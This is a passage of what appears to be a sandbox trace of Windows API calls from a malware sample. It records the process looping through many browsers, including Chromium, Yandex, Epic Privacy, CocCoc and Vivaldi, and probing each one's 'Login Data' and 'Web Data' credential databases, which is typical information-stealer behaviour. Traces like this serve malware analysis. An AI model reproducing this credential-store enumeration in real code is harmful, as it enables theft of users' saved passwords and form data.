(pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chromium\\User Data\\Default\\Web Data") returned 0 [0111.664] GetProcessHeap () returned 0x5b0000 [0111.664] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.664] GetProcessHeap () returned 0x5b0000 [0111.664] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.665] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.665] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 54 [0111.665] GetProcessHeap () returned 0x5b0000 [0111.665] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x70) returned 0x5cbe70 [0111.665] GetProcessHeap () returned 0x5b0000 [0111.666] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.666] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Login Data") returned 0 [0111.667] GetProcessHeap () returned 0x5b0000 [0111.667] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.667] GetProcessHeap () returned 0x5b0000 [0111.667] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.667] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.668] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 62 [0111.668] GetProcessHeap () returned 0x5b0000 [0111.668] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5cbe80 [0111.668] GetProcessHeap () returned 0x5b0000 [0111.668] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.669] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalChromium\\Default\\Login Data") returned 0 [0111.669] GetProcessHeap () returned 0x5b0000 [0111.669] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.670] GetProcessHeap () returned 0x5b0000 [0111.670] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.670] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.671] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 78 [0111.671] GetProcessHeap () returned 0x5b0000 [0111.671] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa0) returned 0x5bb0b8 [0111.671] GetProcessHeap () returned 0x5b0000 [0111.671] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.672] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.672] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Login Data") returned 0 [0111.672] GetProcessHeap () returned 0x5b0000 [0111.672] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb0b8 | out: hHeap=0x5b0000) returned 1 [0111.672] GetProcessHeap () returned 0x5b0000 [0111.672] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.673] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.673] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 76 [0111.673] GetProcessHeap () returned 0x5b0000 [0111.674] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9c) returned 0x5bb400 [0111.674] GetProcessHeap () returned 0x5b0000 [0111.674] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.674] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.675] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Titan Browser\\User Data\\Default\\Web Data") returned 0 [0111.675] GetProcessHeap () returned 0x5b0000 [0111.675] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bb400 | out: hHeap=0x5b0000) returned 1 [0111.675] GetProcessHeap () returned 0x5b0000 [0111.675] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.676] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.676] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 59 [0111.676] GetProcessHeap () returned 0x5b0000 [0111.676] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5cbe70 [0111.676] GetProcessHeap () returned 0x5b0000 [0111.677] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.680] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Login Data") returned 0 [0111.680] GetProcessHeap () returned 0x5b0000 [0111.681] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.681] GetProcessHeap () returned 0x5b0000 [0111.681] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.682] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.682] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 67 [0111.682] GetProcessHeap () returned 0x5b0000 [0111.682] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8a) returned 0x5cbe80 [0111.682] GetProcessHeap () returned 0x5b0000 [0111.683] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.683] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.683] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTitan Browser\\Default\\Login Data") returned 0 [0111.684] GetProcessHeap () returned 0x5b0000 [0111.684] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.684] GetProcessHeap () returned 0x5b0000 [0111.684] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.685] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.685] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 70 [0111.685] GetProcessHeap () returned 0x5b0000 [0111.685] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x90) returned 0x5cbe98 [0111.685] GetProcessHeap () returned 0x5b0000 [0111.686] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.686] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Login Data") returned 0 [0111.687] GetProcessHeap () returned 0x5b0000 [0111.687] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.687] GetProcessHeap () returned 0x5b0000 [0111.687] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.687] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.688] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 68 [0111.688] GetProcessHeap () returned 0x5b0000 [0111.688] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8c) returned 0x5cbe90 [0111.688] GetProcessHeap () returned 0x5b0000 [0111.689] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.689] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.689] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Torch\\User Data\\Default\\Web Data") returned 0 [0111.690] GetProcessHeap () returned 0x5b0000 [0111.690] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.690] GetProcessHeap () returned 0x5b0000 [0111.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.690] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.691] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 51 [0111.691] GetProcessHeap () returned 0x5b0000 [0111.691] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6a) returned 0x5cbe70 [0111.691] GetProcessHeap () returned 0x5b0000 [0111.691] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.694] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Login Data") returned 0 [0111.694] GetProcessHeap () returned 0x5b0000 [0111.694] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.694] GetProcessHeap () returned 0x5b0000 [0111.694] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.695] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.695] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 59 [0111.695] GetProcessHeap () returned 0x5b0000 [0111.695] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5cbe80 [0111.695] GetProcessHeap () returned 0x5b0000 [0111.696] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.696] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.696] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalTorch\\Default\\Login Data") returned 0 [0111.697] GetProcessHeap () returned 0x5b0000 [0111.697] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.697] GetProcessHeap () returned 0x5b0000 [0111.697] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.698] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.698] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 85 [0111.698] GetProcessHeap () returned 0x5b0000 [0111.698] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xae) returned 0x5cbe98 [0111.698] GetProcessHeap () returned 0x5b0000 [0111.699] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.700] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data") returned 0 [0111.700] GetProcessHeap () returned 0x5b0000 [0111.700] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.700] GetProcessHeap () returned 0x5b0000 [0111.700] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.701] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.702] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 83 [0111.702] GetProcessHeap () returned 0x5b0000 [0111.702] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xaa) returned 0x5cbe90 [0111.702] GetProcessHeap () returned 0x5b0000 [0111.702] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.703] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Web Data") returned 0 [0111.703] GetProcessHeap () returned 0x5b0000 [0111.704] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.704] GetProcessHeap () returned 0x5b0000 [0111.704] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.704] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.705] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 66 [0111.705] GetProcessHeap () returned 0x5b0000 [0111.705] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x88) returned 0x5cbe70 [0111.705] GetProcessHeap () returned 0x5b0000 [0111.705] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.706] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Login Data") returned 0 [0111.706] GetProcessHeap () returned 0x5b0000 [0111.707] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.707] GetProcessHeap () returned 0x5b0000 [0111.707] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.707] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.708] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 74 [0111.708] GetProcessHeap () returned 0x5b0000 [0111.708] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x98) returned 0x5cbe80 [0111.708] GetProcessHeap () returned 0x5b0000 [0111.709] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.710] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalYandex\\YandexBrowser\\Default\\Login Data") returned 0 [0111.710] GetProcessHeap () returned 0x5b0000 [0111.710] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.710] GetProcessHeap () returned 0x5b0000 [0111.710] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.711] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.712] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 85 [0111.712] GetProcessHeap () returned 0x5b0000 [0111.712] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xae) returned 0x5cbe98 [0111.712] GetProcessHeap () returned 0x5b0000 [0111.712] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.713] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Login Data") returned 0 [0111.714] GetProcessHeap () returned 0x5b0000 [0111.714] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.714] GetProcessHeap () returned 0x5b0000 [0111.714] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.714] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.715] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 83 [0111.715] GetProcessHeap () returned 0x5b0000 [0111.715] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xaa) returned 0x5cbe90 [0111.715] GetProcessHeap () returned 0x5b0000 [0111.716] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.717] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\Default\\Web Data") returned 0 [0111.717] GetProcessHeap () returned 0x5b0000 [0111.717] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe90 | out: hHeap=0x5b0000) returned 1 [0111.717] GetProcessHeap () returned 0x5b0000 [0111.717] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.718] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.718] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 66 [0111.718] GetProcessHeap () returned 0x5b0000 [0111.718] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x88) returned 0x5cbe70 [0111.718] GetProcessHeap () returned 0x5b0000 [0111.719] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.720] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Login Data") returned 0 [0111.720] GetProcessHeap () returned 0x5b0000 [0111.721] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.721] GetProcessHeap () returned 0x5b0000 [0111.721] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.721] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.722] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 74 [0111.722] GetProcessHeap () returned 0x5b0000 [0111.722] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x98) returned 0x5cbe80 [0111.722] GetProcessHeap () returned 0x5b0000 [0111.723] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.725] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalEpic Privacy Browser\\Default\\Login Data") returned 0 [0111.725] GetProcessHeap () returned 0x5b0000 [0111.726] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.726] GetProcessHeap () returned 0x5b0000 [0111.726] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.726] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.727] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 79 [0111.727] GetProcessHeap () returned 0x5b0000 [0111.727] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa2) returned 0x5cbe98 [0111.727] GetProcessHeap () returned 0x5b0000 [0111.727] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.728] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Login Data") returned 0 [0111.728] GetProcessHeap () returned 0x5b0000 [0111.729] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.729] GetProcessHeap () returned 0x5b0000 [0111.729] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.729] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.730] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 77 [0111.730] GetProcessHeap () returned 0x5b0000 [0111.730] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9e) returned 0x5ba8d8 [0111.730] GetProcessHeap () returned 0x5b0000 [0111.730] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.731] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data\\Default\\Web Data") returned 0 [0111.732] GetProcessHeap () returned 0x5b0000 [0111.732] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ba8d8 | out: hHeap=0x5b0000) returned 1 [0111.732] GetProcessHeap () returned 0x5b0000 [0111.732] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f08 [0111.733] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.734] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 60 [0111.734] GetProcessHeap () returned 0x5b0000 [0111.734] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7c) returned 0x5cbe70 [0111.734] GetProcessHeap () returned 0x5b0000 [0111.734] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.735] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 0 [0111.735] GetProcessHeap () returned 0x5b0000 [0111.736] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe70 | out: hHeap=0x5b0000) returned 1 [0111.736] GetProcessHeap () returned 0x5b0000 [0111.736] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f08 [0111.737] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.738] wvsprintfW (in: param_1=0x5c7f08, param_2="%s%s\\Default\\Login Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 68 [0111.738] GetProcessHeap () returned 0x5b0000 [0111.738] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8c) returned 0x5cbe80 [0111.738] GetProcessHeap () returned 0x5b0000 [0111.738] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.747] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 0 [0111.747] GetProcessHeap () returned 0x5b0000 [0111.747] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe80 | out: hHeap=0x5b0000) returned 1 [0111.747] GetProcessHeap () returned 0x5b0000 [0111.747] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.748] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.749] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 72 [0111.749] GetProcessHeap () returned 0x5b0000 [0111.749] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x94) returned 0x5cbe98 [0111.749] GetProcessHeap () returned 0x5b0000 [0111.750] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.750] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0111.751] GetProcessHeap () returned 0x5b0000 [0111.751] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe98 | out: hHeap=0x5b0000) returned 1 [0111.751] GetProcessHeap () returned 0x5b0000 [0111.751] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.752] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.752] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 70 [0111.752] GetProcessHeap () returned 0x5b0000 [0111.752] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x90) returned 0x5cbe90 [0111.752] GetProcessHeap () returned 0x5b0000 [0111.753] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: 